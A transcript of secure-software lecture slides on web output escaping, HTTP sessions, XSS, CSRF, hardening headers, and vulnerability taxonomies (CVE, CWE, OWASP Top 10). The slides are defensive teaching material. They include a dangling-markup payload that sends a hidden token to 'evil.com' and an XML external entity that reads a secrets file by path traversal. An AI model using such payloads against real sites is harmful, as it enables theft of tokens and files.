Output, Web Applications, Top weakness lists

Download Report

Transcript Output, Web Applications, Top weakness lists

SWE 681 / ISA 681
Secure Software Design &
Programming:
Lecture 6: Output, web applications,
top weakness lists/taxonomies,
& coding standards/guides
Dr. David A. Wheeler
2017-02-25
Outline
• Sending output back
• Web applications
– Including related vulnerabilities
• Common vulnerability lists/taxonomies
• Guides
2
Abstract view of a program
Input
Program
Process Data
(Structured Program
Internals)
Output
You are here
(for the first part
of this lecture)
Call-out to
other programs
(also consider
input & output issues)
3
Minimize security-related feedback
to untrusted users
• “Login failed” – don’t say why
– Log that instead
– Haven’t logged in… especially untrusted!!!
– The point is to prevent attackers from figuring out
valid usernames; if usernames are already public,
don’t worry about hiding whether or not
usernames are valid
• Don’t echo passwords on-screen
– Inhibits shoulder surfing
4
Don’t send comments to users
• Don’t send comments inside material to users
unless you’re sure it’s okay to view
– Sometimes provide system insight, aiding attacker
– System design shouldn’t depend on secrecy, but why
send info only of use to attacker?
• Primarily an issue with web applications
– Comments in HTML/XML/CSS snippets may be used to
generate code
– Okay to comment code; be careful sending it
– Put comments in separate place or strip out
5
Handle full/unresponsive output
• User system may clog/be unresponsive
– E.G., web browser halted, slow TCP/IP response
– Don’t let your system hang due to unresponsive user!
• Release locks quickly, preferably before replying
• Use time-outs on network-oriented writes
– Measure from start of your attempt – ok to halt in the
middle
• Don’t create an easy opportunity for a Denial-ofService attack
6
Control the character encoding of
output
• Don’t let browser/user guess the character
encoding – tell them (and make sure it’s right)
– If browser has to guess, attacker may fool system
into sending material that leads to wrong guess
• Can include in HTML <head>
– <meta http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1">
• HTTP “charset” (HTTP/1.1 is practically
universally implemented, so okay to use now)
7
Metacharacters: Same issue
• Escape any characters you send back that
might be interpreted as metacharacters
• Common problems in HTML/XML: < > & " '
• Challenge: Must ensure browser interprets
them the same way
– Encoding!
– Again, whitelist
8
java.net.URLEncoder.encode
(String s, String enc)
• Translates a string into application/x-www-formurlencoded format using a specific encoding scheme (e.g.,
UTF-8)
• Rules (per Java spec):
– Remain same: A-Z, a-z, 0-9, ".", "-", "*", and "_"
– Space converted to “+”
– All other characters are unsafe:
• Converted into encoding scheme (UTF-8 recommended)
• Each byte is represented by "%xy", where xy is 2-digit hex
representation
• E.G., encode("The string ü@foo-bar" , "UTF-8") produces
"The+string+%C3%BC%40foo-bar“
– In UTF-8, ü is encoded as two bytes C3 (hex) and BC (hex), while
@ is encoded as one byte 40 (hex)
9
Escaping text in
Web application frameworks
• Some web application frameworks encode
strings for HTML by default when outputting
– Safer defaults are generally a good thing (less
likely to make a mistake)
• Know when escaping does & doesn’t happen
– Otherwise you may escape more than once
– Otherwise you might accidentally disable or
circumvent escaping
– Goal: Escape what you need to escape ONCE
10
Ruby on Rails
• “SafeBuffer” is String subclass for HTML text that’s safe to output
– Normal String considered unsafe; user data in String by default
– String.html_safe() returns SafeBuffer version of data without escaping
it (beware – do not use on untrusted user data!)
– If SafeBuffer concatenates (unsafe) String (e.g., “<<“ or “+”), String is
HTML escaped & then concatenated to produce combined SafeBuffer
– If SafeBuffer concatenates SafeBuffer, no additional escaping
– Tag helpers concatenate application-provided tags (in SafeBuffers)
with user-provided data (auto-escaped if unsafe, per previous rule)
• HTML typically generated by ERB template
– Rails renders text into a SafeBuffer; constant template data (part of
application) considered safe & thus is in a SafeBuffer
– <%= ruby code to output %> is concatenated, thus results have HTML
escaping applied to it if its results are unsafe (e.g., normal string)
– <%= raw … %> and <%== … %> are html_safe, not escaped (optimized)
This applies to Ruby on Rails version 3 or later.
Source: Koch, Henning. Everything you know about html_safe is wrong.
http://makandracards.com/makandra/2579-everything-you-know-about-html_safe-is-wrong
11
Ruby on Rails Example
Example ERB Template
<p>
<%= '<br />' %>
<%= '<br />'.html_safe %>
</p>
Internally Ruby on Rails does…
html
html
html
html
html
html
= ''.html_safe
<< '<p>'.html_safe
<< '<br />'
<< '<br />'.html_safe
<< '</p>'.html_safe
Producing
this HTML
<p>
&lt;br /&gt;
<br />
</p>
Source: Koch, Henning. Everything you know about html_safe is wrong.
http://makandracards.com/makandra/2579-everything-you-know-about-html_safe-is-wrong
12
Focus on Web applications:
HTTP, HTTPS, HTML
• HTTP: Protocol for requesting/sending
information
• HTTPS: HTTP over SSL/TLS (encrypted)
• HTML: Common data format
13
HTTP
• HTTP - HyperText Transfer Protocol
– Simple request/response protocol
– Web client sends requests, web server responds
– Runs on top of TCP/IP protocols
• Basic protocol:
– Client (e.g., user’s web browser) sends HTTP request
to HTTP server port (typically port 80)
– HTTP server receives request & performs some action
per request & privileges
– HTTP server sends back request file (if ok) and
status/error message
14
Standard HTTP/1.1 request
methods (per spec)
•
•
•
•
•
•
•
•
OPTIONS: Get info on comm options
GET: Retrieve information
HEAD: Like GET, but just get meta-information
POST: Post (form) data
PUT: Store (replacement) data
DELETE: Delete the resource
TRACE: Show client what recipient recieves
CONNECT: Reserved for future use
Typically have message headers, field-name: [value]
15
HTTP Safe Methods
(per HTTP/1.1 specification)
• GET and HEAD methods SHOULD NOT have the
significance of taking any action other than retrieval
– Don’t buy/sell anything, change status, etc.
• User agents can represent other methods (e.g., POST,
PUT and DELETE) differently, denote “possibly unsafe”
– E.g., GET = Click on link, POST = “Submit” button
– Important hint to user – helps prevent fooling user
• Protocol can’t enforce, but if GET or HEAD used, “user
did not request the side-effects, so therefore cannot be
held accountable for them”
16
HTTP Idempotent Methods
(per HTTP/1.1 specification)
• “Idempotence” = aside from error or expiration issues,
side-effects of > 1 identical requests same as 1 request
• Methods GET, HEAD, PUT and DELETE idempotent
– Not POST!
• Methods OPTIONS and TRACE also idempotent
– Because they SHOULD NOT have side effects at all
• Beware: a sequence of several requests can be nonidempotent, even if all of its methods are idempotent
– E.G., a sequence is non-idempotent if its result depends on
a value that is later modified in the same sequence
17
Trivial GET request
(from client to server)
GET /index.html HTTP/1.1
host: www.dwheeler.com
accept-Language: en
Connection: keep-alive
referer: https://www.dwheeler.com/misc.html
Blank line to end the request
HTTP is a simple text-based protocol; every line ends
with CRLF (officially) and a blank line ends the request.
You can send this manually using:
telnet www.dwheeler.com 80
18
HTTP Responses
• First line is “Status line”
– Protocol version, 3-digit numeric status code, &
associated textual phrase
– 2xx: Success - The action was successfully
received, understood, and accepted. 200=OK
– 4xx: Client Error - The request contains bad syntax
or cannot be fulfilled. 404=not found,
401=unauthorized
• Followed by rest of response
19
Trivial GET reply
HTTP/1.1 200 OK
Date: Mon, 01 Oct 2012 21:41:47 GMT
Server:
Last-Modified: Sun, 02 Sep 2012 18:49:14 GMT
ETag: "67622cb-9d4f-7b3f5e80"
Accept-Ranges: bytes
Content-Length: 40271
Content-Type: text/html
Blank line precedes reply data
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>
…
20
HTTP Response Splitting
• HTTP replies (like the previous one) can
include many fields
• Be very careful about data sent back in fields
– Especially newline & return! Attacker can create
new fields/responses if can insert these
– Any control characters & “:” concerning
– Whitelist, not blacklist – limit to alphanum if can
– Best to limit input also (if you can)
21
Trivial POST Request
POST /myform.html HTTP/1.1
host: www.example.com
cookie: myId=dwheeler
referer: http://www.example.com/index.html
content-Type: application/-x-www-form-urlencoded
content-Length: 325
connection: keep-alive
Blank line to end the header, encoded data follows
22
GET: Parameters sent as part of
query string
• “GET” can send information, via query string
parameters
– Often sent to other sites by HTTP referer header
– Often stored in browser history
– Often written to log files
• POST sends parameters separately (body)
• Use POST when:
–
–
–
–
Doing some action that shouldn’t be auto-repeated
Information is sensitive
When authentication required
In these cases forbid GET, don’t allow as alternative
23
HTTP Cookies: Basics
• Server may reply with fields to set cookies:
Set-Cookie: name=value
Set-Cookie: name2=value2; Expires=Wed, 09-Jun-2021 10:18:14 GMT
• From then on, browser includes cookie values
as part of requests to that domain:
Cookie: name=value; name2=value2
• If no expiration time set, cookie expires when
browser exits
• If expiration time set, browser is supposed to
store cookie persistently (user may erase)
24
Cookie attributes
• Beyond name/value pair, cookie attributes:
– cookie domain: Server domain when cookie will be
sent (default: this domain, limits on alternates)
– path: Path when cookie will be sent (default: this
path)
– expiration time or maximum age (seconds)
– secure flag: Only transmit on encrypted channel
– HttpOnly flag: Only HTTP/HTTPS (not javascript)
• Browsers will not send cookie attributes back to
the server (just name/value pair)
25
Session Management
• HTTP is stateless
– By itself, a server doesn’t know of any relationship between
“this” request (or user) & previous requests
– Perfect for “please send me this static file”
– Inadequate for interactive applications, shopping carts, etc.
• For many applications, need to identify & manage sessions
– Typically by passing a “session identifier”
– User logs in, gets session id, all logged-in requests have that id
– Typically exchanged in a cookie (secure, HttpOnly)
• Good session identifiers are not guessable
• Session management, properly implemented, can prevent
session hijacking and cross-site request forgery (CSRF)
attacks
26
Session Management: Reuse Code
• Best to use existing application container/ library
for HTTP session management
– Set up session ids, etc.
• But check that it’s secure (may need to
configure):
– Session identifier should have at least 128 bits of
random data (else too easily guessed)
– Must use cryptographically secure pseudo-random
number generator (PRNG) to generate identifier – not
“add one” or roll-your-own
– Encrypt session ids over untrusted channels
• If you don’t, many can see session id, enables session forging
27
Always create new session when
user authenticates
• Even if user has an existing session, always create
a new session when user authenticates
– Ignore old session
• Failing to do so permits “session fixation” attack
– Attacker creates a new session, tricks user into using
that session to authenticate against
– Server sees user has a session ID & reuses it
– Attacker may now be able to use session ID (that they
created) to gain control with victim’s privileges
28
Session fixation attack
1. Mallory logs in & gets
session_id = 111
4. Mallory re-accesses with
session_id, which now has
Alice’s permissions
Mallory
(Malicious user)
4. Server sees session_id & just
reuses it, & reassociates that
session_id to Alice
Web Server
2. “Click here to
see dancing pigs”
http://...?session_
id=111
3. Alice clicks, browser goes to site
& auto-provides session_id=111,
username, and password
Alice’s
Web browser
• In session fixation attack, attacker exploits
server that fails to reassign session ids on login
29
Sessions: Limit Time
(Idle time & session time)
• Set maximum session idle time and maximum session
time to reduce risk & damage
– If user doesn’t log out, only short exposure time
– Fewer valid session ids for attacker to guess
– Even if attacker gets session id, limits time it’s valid
• E.g., an application container that implements Java
Servlet: configure web.xml to set session idle timeout:
<session-config> <!—timeout, in minutes -->
<session-timeout>60</session-timeout>
</session-config>
30
Session time: Limit maximum time
• May have to implement session timeouts yourself
• Java servlets: Chess book describes how to use
doFilter() to do this
– Store current time for session first time request is
made for that session
– If session still in use after maximum lifetime,
invalidate session
• Be sure to provide a “logout” function for users
– So users can make the time even shorter!
31
Sessions: Ensure that
logging off disables cookie
• Users expect that after “log off” they must “log in” to
reconnect
– To ensure this, log off must disable server-side session
cookies to prevent its reuse
– Otherwise, the cookie could continue session
– Session cookies can be captured, e.g., by malware, XSS (to
be discussed), or by stealing your phone
• Many systems don’t disable cookies on log off
– Failures include: Office 365, Yahoo mail, Wordpress
– Correctly disable: Gmail, Tweetdeck, Facebook
– As of 2013-07-13
More info: http://samsclass.info/123/proj10/cookie-reuse.htm
32
Cross-Site Scripting (XSS) /
Cross-Site Malicious Content
• Clients (e.g., web browsers) typically presume
that server intended to send data it sent
– Some secure programs (e.g., web apps) accept data &
pass that data on to a user’s application (the victim)
– If the secure program doesn't protect the victim, the
victim's application (e.g., their web browser) may then
process that data in a way harmful to the victim
– Server isn’t subverted directly… but used as a passthrough to victim
• Not called “CSS” (= Cascading Style Sheets)
33
XSS – Persistent Store Example
1. Mallory sends
malicious data (e.g.,
HTML comment with
malicious script in it)
Mallory
(Malicious user)
Web Server
2. Data stored &
later retrieved
Database
3. Alice requests info (e.g., view
comments), & receives malicious
code (that may be auto-run)
Alice’s
Web browser
• In persistent-store XSS, attacker sends data to server
that is stored by server for later use
• When victim requests, server includes malicious data
34
XSS –Reflection Example
Web Server
Mallory
(Malicious user)
1. Mallory sends
malicious data to
Alice (e.g., in a
hypertext link/form)
3. Alice receives
malicious data
2. Alice “reflected back” to
sends on her… and trusts it
to server
Alice’s
Web browser
• In reflected XSS, attacker sends data to victim so victim will send it on to
server
– Often a special hypertext link or web form pointed to trusted server
• Server then reflects data back; victim browser sees data “from” the server
& trusts it
35
XSS- DOM-based
• Client is tricked into sending itself attack
• See:
• https://www.owasp.org/index.php/Types_of_
Cross-Site_Scripting
36
Countering XSS
• Output escaping
– Untrusted user data should be escaped before sending to user
– Avoid copying data back to user (if URL bad, don’t send it back –
legitimate user can see it already)
• Input filtering for metacharacters
–
–
–
–
Metacharacters include <, &, >, ",'
Forbid/remove/quote on input
Can’t always do this
Use libraries for HTML input (e.g., to allow <i>…</i> without
allowing embedded Javascript)
• Set HttpOnly on cookies sent
– Web browser scripts can’t access these cookie values
– Imperfect defense, but can make some attacks harder
37
Newer XSS countermeasure:
Content Security Policy (CSP)
• Content Security Policy (CSP) is W3C Candidate Recommendation
• Defines “Content-Security-Policy” HTTP header
– If used, creates whitelist of sources of trusted content for this webpage
– Compliant browsers only execute/render items (Javascript) from those sources
• Chrome 16+, Safari 6+, and Firefox 4+. IE 10 has very limited support
– Twitter and Facebook have deployed this
• Typically must modify website design to fully use it
– E.g., move Javascript into separate files, otherwise receiving browser can’t
distinguish whitelisted & malicious Javascript
• Only works when users use compliant browsers
• Expect CSP to grow additional capabilities
• More info:
– http://www.html5rocks.com/en/tutorials/security/content-security-policy/
– http://www.w3.org/TR/CSP/
– https://blog.twitter.com/2011/improving-browser-security-csp
38
Content Security Policy (CSP) helps,
but is no panacea
• CSP is a useful defensive measure, but can sometimes be worked
around
• E.G., evil URL:
<img src='http://evil.com/log.cgi? Injected line, non-terminated param
...
<input type="hidden" name="xsrf_token" value="12345"> Secret
...
'
Normally-occurring apostrophe
• When user views, evil.com receives a lot of the following text
(including text that was supposed to be hidden)
• Use output escaping & input filtering; then use defensive measures
(like CSP) to counter mistakes
Source: “Postcards from the post-XSS world” by Michal Zalewski, http://lcamtuf.coredump.cx/postxss/
39
Cross-Site Request Forgery
(CSRF/XSRF)
• Cross-site request forgery (CSRF/XSRF) essentially
opposite of XSS
– XSS exploits user’s trust in a server
– CSRF/XSRF exploits server’s trust in a client
• In CSRF/XSRF:
– Attacker tricks user into sending data to server
– Server believes that user consciously & intentionally
chose that action
• XSS fools clients; XSRF fools servers
40
Cross-Site Request Forgery
(CSRF/XSRF) Example
Web Server
Mallory
(Malicious user)
1. Mallory sends
malicious data to
Alice (e.g., in a
hypertext link/form)
2. Alice sends on to server;
server acts on command
“sent” by Alice
Alice’s
Web browser
• In CSRF/XSRF, like reflected XSS, attacker sends data to
victim so victim will send it on to server
– Attacker’s approach is in many ways like reflected XSS
• Attacker’s purpose is for server to act on the command
– Target is server not client – difference from XSS
41
Countering CSRF/XSRF
• Require authentication data in same HTTP Request in critical operation
• “SameSite” cookie attribute (Lax or Strict), if browser supports
– Solves long-term. https://www.sjoerdlangkemper.nl/2016/04/14/preventingcsrf-with-samesite-cookie-attribute/
• Require secret user-specific CSRF token in all forms/side-effect URLS
(attacker doesn’t know, so can’t put in token) – usual solution today
• Check HTTP Referer or Origin header
– If you do that, “no Referer” must be treated as unauthorized (attacker can
suppress Referer)
– Some client vulnerabilities may subvert this
• Use CSRF countermeasures in login - prevent login forgery
• Helpful partial countermeasures (make harder to attack):
– Logoff after X minutes inactivity
– Don’t allow GET (link) to have side-effects - only POST (button)
• XSS vulnerabilities allow bypass of CSRF countermeasures
42
Web applications – hardening
headers to make attacks harder
• Content Security Policy (CSP) – already noted
• HTTP Strict Transport Security (HSTS)
– “Only use HTTPS from now on for this site”
• X-Content-Type-Options (as "nosniff")
– Don’t guess MIME type (& confusion it can bring)
• X-Frame-Options
– Clickjacking protection, limits how frames may be used
• X-XSS-Protection
– Force enabling filter to detect likely (reflected) XSS by
monitoring requests / responses
– On by default in most browsers
See: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
43
Redirection
• Web applications frequently redirect and forward users to other
pages and websites
• Don’t use unvalidated untrusted data to determine destination
pages
• Solutions (per OWASP):
1.
2.
3.
4.
Simply avoid using redirects and forwards.
If used, don’t involve user parameters in calculating the destination.
This can usually be done.
If destination parameters can’t be avoided, ensure that the supplied
value is valid, and authorized for the user. It is recommended that
any such destination parameters be a mapping value, rather than the
actual URL or portion of the URL, and that server side code translate
this mapping to the target URL
Applications can use OWASP ESAPI to override the sendRedirect()
method to make sure all redirect destinations are safe
44
Disable caching correctly for
sensitive data
• Web browsers normally cache web pages to storage
– Greatly reduces future latency
– Do not cache sensitive data – enables many attacks
• Disable sensitive data caching using HTTP 1.1 (1999)
– Cache-Control: no-store
• Common mistake = Using non-standard approach
– Non-standard cache disabling mechanisms only disable
caches on some browsers, & few test it
– “Industry-wide Misunderstandings of HTTPS” (June 2013)
found that 70% of tested financial, healthcare, insurance
and utility account sites did it wrong (“Only IE6 exists”)
• In general, try to use standard mechanisms for security
45
AJAX & JSON
• AJAX = “Asynchronous JavaScript and XML”
– Common set of technologies/techniques
• Often uses JSON = JavaScript Object Notation
– For data serialization, original spec RFC 4627
• JSON example:
{
"firstName": "David",
"lastName": "Wheeler",
"address": {
"streetAddress": "1600 Pennsylvania Ave",
"city": "Washington",
"state": "DC"
JSON doesn’t allow trailing commas
}
(JSON5 does)
}
46
JSON: Don’t just “eval”
untrusted data!
• Most JSON-formatted text also syntactically legal
JavaScript code
• “Easy” way to parse JSON-formatted data in JavaScript
is eval()
– Doesn’t support some Unicode characters
• Security vulnerability if data & Javascript environment
not controlled by single trusted source
– E.G,. malicious Javascript attack, application forgery, etc.
• In general, don’t “eval” untrusted data!!!
– Best approach: use newer function JSON.parse()
• Mozilla Firefox 3.5+, MS IE 8+, Opera 10.5+, Google Chrome, Safari
– Next-best (old browsers): Check input first - picky whitelist
47
XML: Check formatting
• Lots of data/messages formatted using XML
• “Well-formed”: Follows certain syntax rules
– E.G., all opened tags are closed, nesting ok
– Check before using from untrusted sources!
• “Valid”: Meets some schema definition
– Check for validity before using untrusted input
• Eliminates many problems – schema == whitelist
– Don’t let attacker determine what schema to use!
• Decide what schema is okay & use that
48
XML: External References
• Don’t accept unchecked external references from untrusted sources
– These are URLs (absolute or relative)
– Forbid or check (with whitelist) external reference before use
• Examples:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!DOCTYPE letter [
<!ENTITY part1 SYSTEM "http://www.example.com/part1.xml">
<!ENTITY part2 SYSTEM "../../../secrets/part2.xml">
]> …
<building>
&part1; &part2;
</building>
49
Web applications are client/server
• Web browser is a client, web server is a server
• Need to not trust each other
• In particular, server needs to not blindly trust
what client says
– Javascript on client is great…
– Server must NOT trust validation by untrusted
client
– Yes, we’ve said this before 
50
Top weakness lists, taxonomies,
and style guides
51
Overview of some common top
weakness lists & taxonomies
• Different organizations have developed “top” weaknesses (types of flaws
that can lead to a vulnerability)
– Goal: Identify some specific “things to look for first”
– Vulnerability lists may merge problems that can’t happen (or are less
important) in a particular environment – or be specific to a different
environment (web vs. embedded)
– Best “top” list is the one for your project & organization
– You do not need to memorize items in list or CWE numbers!
– You do need to know, for a given name, what it is (if we’ve covered it)
• Taxonomies try to give broader overviews/organization of weaknesses
– Some organized by attack (how to attack it)
– Some organized by flaws (defect which may result in security violation)
• We’ll review a few “top” weakness lists & taxonomies
– Help reinforce what we’ve already learned
– Want you to know of some common ones (name recognition)
– Haven’t covered some yet (crypto) – we will!
52
Common Vulnerabilities and
Exposures (CVE)
• CVE = “dictionary of publicly known information security
vulnerabilities and exposures”
• Vulnerability = a specific mistake in some specific software
directly usable by an attacker to gain access to
system/network (not just any mistake)
• Exposure = a specific system configuration issue or mistake
in software that allows access to information or capabilities
that can be used as a stepping-stone
• CVE-2013-1380 = Specific Adobe Flash Player vulnerability
• Common naming system – know if discussing same thing
– Many organizations report vulnerabilities
– CVE IDs let you cross-reference their reports
• More info: http://cve.mitre.org & http://nvd.nist.gov/
53
Common Vulnerability Scoring
System (CVSS) version 2.0
• Standard scoring system for a vulnerability (0..10, 10=riskiest)
• Goal: Simplify prioritizing them for remediation
• Base metric group - intrinsic characteristics
–
–
–
–
–
–
Access Vector (AV): Local, adjacent network, network
Access Complexity (AC): High, medium, low
Authentication (Au): Multiple, single, none
Confidentiality Impact (C): None, partial, complete
Integrity Impact (I): None, partial, complete
Availability Impact (A): None, partial, complete
• Temporal (optional) - characteristics that change over time
– Exploitability (E); Remediation Level (RL); Report Confidence (RC)
• Environmental (optional) - characteristics relevant to particular
environment
– Collateral Damage Potential (CDP); Target Distribution (TD); Security
Requirements (CR, IR, AR)
“A Complete Guide to the Common Vulnerability Scoring System Version 2.0” http://www.first.org/cvss/cvss-guide.html
“CVSS version 2 calculator” http://nvd.nist.gov/cvss.cfm?calculator&version=2
54
Common Weakness Enumeration
(CWE)
• Common Weakness Enumeration (CWE) = list of
software weaknesses
• Weakness = Type of vulnerabilities
• CWE-120 = Buffer Copy without Checking Size of
Input (“Classic Buffer Overflow”)
• Again, common naming system
– Useful as “common name”
– Does have some structuring/organization (slices,
graphs, parents/children)… but that’s not its strength
• More info: http://cwe.mitre.org
55
OWASP Top 10 (2013)
Security Risk
Covered in class session on:
A1: Injection
Call out (SQL injection, shell injection)
A2: Broken Authentication and Session
Management
Authentication
A3: Cross-Site Scripting (XSS)
Design, Web application
A4: Insecure Direct Object References
Design (least privilege), Web application
A5: Security Misconfiguration
Design
A6: Sensitive Data Exposure
Design (least privilege), Cryptography
A7: Missing Function Level Access Control
Design (least privilege)
A8: Cross-Site Request Forgery (CSRF)
Design, Web application
A9: Using Components with Known
Vulnerabilities
Obsolete code (8), Call out, Design
A10: Unvalidated Redirects and Forwards
Design, Web application
56
CWE/SANS Top 25 Most
Dangerous Software Errors (2011)
Rank ID
Name
[1]
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
[2]
CWE-78
[3]
CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
[4]
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
[5]
CWE-306 Missing Authentication for Critical Function
[6]
CWE-862 Missing Authorization
[7]
CWE-798 Use of Hard-coded Credentials
[8]
CWE-311 Missing Encryption of Sensitive Data
[9]
CWE-434 Unrestricted Upload of File with Dangerous Type
Improper Neutralization of Special Elements used in an OS Command ('OS Command
Injection')
[10] CWE-807 Reliance on Untrusted Inputs in a Security Decision
57
2011 CWE/SANS Top 25 Most
Dangerous Software Errors
Rank ID
Name
[11] CWE-250 Execution with Unnecessary Privileges
[12] CWE-352 Cross-Site Request Forgery (CSRF)
[13] CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
[14] CWE-494 Download of Code Without Integrity Check
[15] CWE-863 Incorrect Authorization
[16] CWE-829 Inclusion of Functionality from Untrusted Control Sphere
[17] CWE-732 Incorrect Permission Assignment for Critical Resource
[18] CWE-676 Use of Potentially Dangerous Function
[19] CWE-327 Use of a Broken or Risky Cryptographic Algorithm
[20] CWE-131 Incorrect Calculation of Buffer Size
58
2011 CWE/SANS Top 25 Most
Dangerous Software Errors
Rank ID
Name
[21] CWE-307 Improper Restriction of Excessive Authentication Attempts
[22] CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
[23] CWE-134 Uncontrolled Format String
[24] CWE-190 Integer Overflow or Wraparound
[25] CWE-759 Use of a One-Way Hash without a Salt
59
Name
NIST National Vulnerability
Database (NVD): CWE subset
CWE-ID
Description
Authentication Issues
CWE-287
Failure to properly authenticate users.
Credentials
Management
CWE-255
Failure to properly create, store, transmit, or protect
passwords and other credentials.
Permissions, Privileges,
and Access Control
CWE-264
Failure to enforce permissions or other access restrictions for
resources, or a privilege management problem.
CWE-119
Buffer overflows and other buffer boundary errors in which a
program attempts to put more data in a buffer than the buffer
can hold, or when a program attempts to put data in a
memory area outside of the boundaries of the buffer.
Cross-Site Request
Forgery (CSRF)
CWE-352
Failure to verify that the sender of a web request actually
intended to do so. CSRF attacks can be launched by sending a
formatted request to a victim, then tricking the victim into
loading the request (often automatically), which makes it
appear that the request came from the victim. CSRF is often
associated with XSS, but it is a distinct issue.
Cross-Site Scripting
(XSS)
CWE-79
Failure of a site to validate, filter, or encode user input before
returning it to another user’s web client.
Buffer Errors
60
Name
NIST National Vulnerability
Database (NVD): CWE subset
CWE-ID
Description
CWE-310
An insecure algorithm or the inappropriate use of one; an
incorrect implementation of an algorithm that reduces
security; the lack of encryption (plaintext); also, weak key or
certificate management, key disclosure, random number
generator problems.
CWE-22
When user-supplied input can contain “..” or similar characters
that are passed through to file access APIs, causing access to
files outside of an intended subdirectory.
Code Injection
CWE-94
Causing a system to read an attacker-controlled file and
execute arbitrary code within that file. Includes PHP remote
file inclusion, uploading of files with executable extensions,
insertion of code into executable files, and others.
Format String
Vulnerability
CWE-134
The use of attacker-controlled input as the format string
parameter in certain functions.
Configuration
CWE-16
A general configuration problem that is not associated with
passwords or permissions.
Information Leak /
Disclosure
CWE-200
Exposure of system information, sensitive or private
information, fingerprinting, etc.
Cryptographic Issues
Path Traversal
61
Name
NIST National Vulnerability
Database (NVD): CWE subset
CWE-ID
Description
Input Validation
CWE-20
Failure to ensure that input contains well-formed, valid data
that conforms to the application’s specifications. Note: this
overlaps other categories like XSS, Numeric Errors, and SQL
Injection.
Numeric Errors
CWE-189
Integer overflow, signedness, truncation, underflow, and other
errors that can occur when handling numbers.
OS Command Injections
CWE-78
Allowing user-controlled input to be injected into command
lines that are created to invoke other programs, using
system() or similar functions.
Race Conditions
CWE-362
The state of a resource can change between the time the
resource is checked to when it is accessed.
CWE-399
The software allows attackers to consume excess resources,
such as memory exhaustion from memory leaks, CPU
consumption from infinite loops, disk space consumption, etc.
CWE-89
When user input can be embedded into SQL statements
without proper filtering or quoting, leading to modification of
query logic or execution of SQL commands.
Resource Management
Errors
SQL Injection
62
Name
NIST National Vulnerability
Database (NVD): CWE subset
CWE-ID
Description
Link Following
CWE-59
Failure to protect against the use of symbolic or hard links that
can point to files that are not intended to be accessed by the
application.
Other
NVD is only using a subset of CWE for mapping instead of the
No Mapping entire CWE, and the weakness type is not covered by that
subset.
Not in CWE
No Mapping
The weakness type is not covered in the version of CWE that
was used for mapping.
Insufficient Information
No Mapping
There is insufficient information about the issue to classify it;
details are unknown or unspecified.
Design Error
A vulnerability is characterized as a “Design error” if there
No Mapping exists no errors in the implementation or configuration of a
system, but the initial design causes a vulnerability to exist.
Source: http://nvd.nist.gov/cwe.cfm
63
“A Software Flaw Taxonomy:
Aiming Tools At Security”
Source:
“A Software Flaw Taxonomy: Aiming Tools At Security”
Sam Weber Paul A. Karger Amit Paradkar
http://cwe.mitre.org/documents/sources/
ASoftwareFlawTaxonomy-AimingToolsatSecurity
%5BWeber,Karger,Paradkar%5D.pdf
64
Weakness Classes
(NSA Center for Assured Software)
Weakness class
Example CWEs
Authentication and Access Control
CWE-620: Unverified Password Change
Buffer Handling [not in Java]
CWE-121: Stack-based Buffer Overflow
Code Quality
CWE-561: Dead Code, CWE-676 Use of potentially dangerous function
Control Flow Management
CWE-833: Deadlock
Encryption and Randomness
CWE-328: Reversible One-Way Hash
Error Handling
CWE-252: Unchecked Return Value
File Handling
CWE-23: Relative Path Traversal
Information Leaks
CWE-534: Information Exposure Through Debug Log Files
Initialization and Shutdown
CWE-415: Double Free
Injection
CWE-134: Uncontrolled Format String
Malicious Logic
CWE-506: Embedded Malicious Code
Number Handling
CWE-369: Divide by Zero
Pointer and Reference Handling
CWE-476: NULL Pointer Dereference
Source:
http://samate.nist.gov/
docs/CAS_2011_
SA_Tool_Method.pdf
65
WASC Threat Classification v2.0
• Attacks
– Abuse of Functionality, Brute Force, Buffer Overflow, Content Spoofing,
Credential/Session Prediction, Cross-Site Scripting, Cross-Site Request
Forgery, Denial of Service, Fingerprinting, Format String, HTTP
Response Smuggling, HTTP Response Splitting, HTTP Request Smuggling,
HTTP Request Splitting, Integer Overflows, LDAP Injection, Mail
Command Injection, Null Byte Injection, OS Commanding, Path
Traversal, Predictable Resource Location, Remote File Inclusion (RFI),
Routing Detour, Session Fixation, SOAP Array Abuse, SSI Injection,
SQL Injection, URL Redirector Abuse, XPath Injection, XML Attribute
Blowup, XML External Entities, XML Entity Expansion, XML Injection,
XQuery Injection
• Weaknesses
– Application Misconfiguration, Directory Indexing, Improper Filesystem
Permissions, Improper Input Handling, Improper Output Handling,
Information Leakage, Insecure Indexing, Insufficient Anti-automation,
Insufficient Authentication, Insufficient Authorization, Insufficient
Password Recovery, Insufficient Process Validation, Insufficient Session
Expiration, Insufficient Transport Layer Protection, Server
Misconfiguration
Source: http://projects.webappsec.org/w/page/13246978/Threat%20Classification
66
Seven Pernicious Kingdoms
•
•
•
•
•
•
•
Input Validation and Representation
API Abuse
Security Features
Time and State
Error Handling
Code Quality
Encapsulation
Source: Tsipenyuk, Chess, and McGraw,
“Seven Pernicious Kingdoms: A Taxonomy of Software Security Errors”,
Proceedings SSATTM, 2005
67
Software SOAR 2014
(Wheeler & Moorthy)
1.
Provide design and code* quality
2.
Counter known vulnerabilities (CVEs)
(incl. of obsolete subcomponents)
3.
Ensure authentication and access control*
a.
Authentication Issues
b.
Credentials Management
c.
Permissions, Privileges, and Access Control
d.
Least Privilege
4.
Counter unintentional-“like” weaknesses
5.
Counter intentional-“like”/malicious logic*
a.
Known malware
b.
Not known malware
6.
Provide anti-tamper (confidentiality of algorithms for
CPI) and ensure transparency
7.
Counter development tool inserted weaknesses
8.
Provide secure delivery
9.
Provide secure configuration
10. Other (e.g., power)
a.
Buffer Handling*
b.
Injection* (SQL, command, etc.)
c.
Encryption and Randomness*
d.
File Handling*
e.
Information Leaks*
f.
Number Handling*
g.
Control flow management*
h.
Initialization and Shutdown [of
resources/components]*
i.
Design Error
j.
System Element Isolation
k.
Error Handling* and Fault isolation
l.
Pointer and reference handling*
